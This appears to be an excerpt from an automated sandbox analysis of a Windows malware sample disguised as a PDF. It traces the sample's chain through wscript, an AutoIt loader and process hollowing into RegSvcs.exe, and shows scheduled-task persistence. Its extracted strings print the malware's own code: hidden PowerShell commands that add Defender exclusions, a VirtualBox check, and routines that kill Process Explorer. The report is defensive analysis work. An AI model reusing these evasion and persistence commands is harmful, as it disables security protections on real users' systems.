      Source: rnnsh.xls.0.drBinary or memory string: If ProcessExists("VBoxTray.exe") Then
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CDE6A3 VirtualQuery,GetSystemInfo,
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CCA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CDC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CEB348 FindFirstFileExA,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0037E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0037D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0038A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0038A488 FindFirstFileW,Sleep,FindNextFileW,FindClose,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_003865F1 FindFirstFileW,FindNextFileW,FindClose,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0034C642 FindFirstFileExW,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00387248 FindFirstFileW,FindClose,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_003872E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0037DB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00315D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CE7DEE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00335078 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CDF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CEC030 GetProcessHeap,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0038F3FF BlockInput,
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeMemory allocated: page read and write | page guard
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CDF9D5 SetUnhandledExceptionFilter,
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CDF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CDFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CE8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00330D65 SetUnhandledExceptionFilter,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_003429B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00330BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00330FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

      HIPS / PFW / Operating System Protection Evasion

      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" daitsfsh-waune.icm.vbe
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" daitsfsh-waune.icm.vbe
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeMemory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1300000 protect: page execute and read and write
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1300000 value starts with: 4D5A
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1300000
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeMemory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 11EE000
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0037BB02 SendInput,keybd_event,
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" daitsfsh-waune.icm.vbe
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe" rnnsh.xls
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp897A.tmp
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp8D34.tmp
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeProcess created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $colitems = $owmi.execquery("select * from antivirusproduct")
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: for $objantivirusproduct in $colitems
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $usb = $objantivirusproduct.displayname
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: next
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return $usb
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endfunc
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: func disabler()
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;if antivirus() = "windows defender" then
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;#requireadmin
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell"," -command add-mppreference -exclusionpath " & @scriptdir,"","",@sw_hide)
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionprocess 'regsvcs.exe'","","",@sw_hide)
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '.vbs'","","",@sw_hide)
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '.vbe'","","",@sw_hide)
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '*.vbs'","","",@sw_hide)
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionextension '*.vbe'","","",@sw_hide)
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;endif
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endfunc
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: func antianalysis()
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if winexists("process explorer") then
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: winclose("process explorer")
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: processclose("procexp64.exe")
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: processclose("procexp.exe")
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endif
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t6ecsz
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmpBinary or memory string: c:\windows\syswow64\wscript.exe\??\c:\windows\syswow64\wscript.exe;
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmpBinary or memory string: 63209-405:en-usenwscript<
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmpBinary or memory string: 23456789
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmpBinary or memory string: h:mm:ss tt
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmpBinary or memory string: h:mm tt
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmpBinary or memory string: m/d/yyyymmmm yyyy
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmpBinary or memory string: dddd, mmmm d, yyyy
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.339508643.0000000000C00000.00000004.00000020.00040000.00000000.sdmpBinary or memory string: @nvny
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: @mhv0lhv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: mv bhv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: mv`phv0
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: phv thv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: mhvnhv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ghvpihv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: qhv`ahv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: mv@alv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: mv@jhv vhvpyhv@hhv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: hv0xhvpdhv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: yhv fhv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: bhvpghv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: @hvpmhvpthvpthv`khv0
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: wpchv ohvpihv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: nhvp[hv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: rhv`ghv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: nhvp[hvrhv`ghv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: vhv`vhv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: fhvpdhvpphv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: vhv`vhvfhvpdhvpphv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: hv`rhv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ehvpxhv0yhv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: mvpehv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ehv`ehv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: zhv@nhv
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ihv uhv f
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: maximum allowed array size (%u) is exceededcmtrrh%uhc%ux%uxc%u;%u
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: .\sesecurityprivilegeserestoreprivilegesecreatesymboliclinkprivilege\??\unc\aclstmrtmp%d
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: select * from win32_operatingsystem
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: *messages***
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: ...root\cimv2select * from win32_operatingsystemwqlnamewindows 10*?.rar.exe.sfx00?*<>|"?*%c:\\\?\uncconprnauxnulcom#lpt#*messages****messages***r!
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: cryptprotectmemory
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: cryptunprotectmemory
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:stringsdialogmenudirectionrtl$%s:@%s: ,s$%s@%s$%s:%s$%s:captionsizecrypt32.dllcryptprotectmemorycryptunprotectmemorycryptprotectmemory failedcryptunprotectmemory failed
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: xlistpos
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setdlldirectoryw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setdefaultdlldirectories
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: unknown exception
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: bad allocation
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: xlistposkernel32setdlldirectorywsetdefaultdlldirectoriesversion.dlldxgidebug.dllsfc_os.dllsspicli.dllrsaenh.dlluxtheme.dlldwmapi.dllcryptbase.dlllpk.dllusp10.dllclbcatq.dllcomres.dllws2_32.dllws2help.dllpsapi.dllieframe.dllntshrui.dllatl.dllsetupapi.dllapphelp.dlluserenv.dllnetapi32.dllshdocvw.dllcrypt32.dllmsasn1.dllcryptui.dllwintrust.dllshell32.dllsecur32.dllcabinet.dlloleaccrc.dllntmarta.dllprofapi.dllwindowscodecs.dllsrvcli.dllcscapi.dllslc.dllimageres.dlldnsapi.dlliphlpapi.dllwinnsi.dllnetutils.dllmpr.dlldevrtl.dllpropsys.dllmlang.dllsamcli.dllsamlib.dllwkscli.dlldfscli.dllbrowcli.dllrasadhlp.dlldhcpcsvc6.dlldhcpcsvc.dllxmllite.dlllinkinfo.dllcryptsp.dllrpcrtremote.dllaclui.dlldsrole.dllpeerdist.dlluxtheme.dllplease remove %s from %s folder. it is unsecure to run %s until it is done.createthread failed
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: waitformultipleobjects error %d, getlasterror %d
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: thread pool initialization failed.%ls>%s: %s
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: unknown exceptionbad allocation
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: z2fq`
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: rarhtmlclassnameshell.explorerabout:blank<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head></html></p><br><style></style><style>body{font-family:"arial";font-size:12;}</style>&nbsp;
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_browsetitle
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_cmdextracting
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_skipping
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_unexpeof
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_fileheaderbroken
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_headerbroken
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_mainheaderbroken
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_cmtheaderbroken
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_cmtbroken
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_outofmemoryerror
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_unknownmethod
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_cannotopen
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_cannotcreate
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_cannotmkdir
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_encrcrcfailed
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_extrcrcfailed
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_packeddatacrcfailed
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_writeerror
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_readerror
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_closeerror
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_cannotfindvol
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_badarchive
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_extracting
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_asknextvoltitle
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_archeaderbroken
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_done
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_error
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_errors
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_bytes
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_modifiedon
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_badfolder
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_createerrors
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_restarthint
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_crcerrors
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_allfiles
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: s:ids_title1
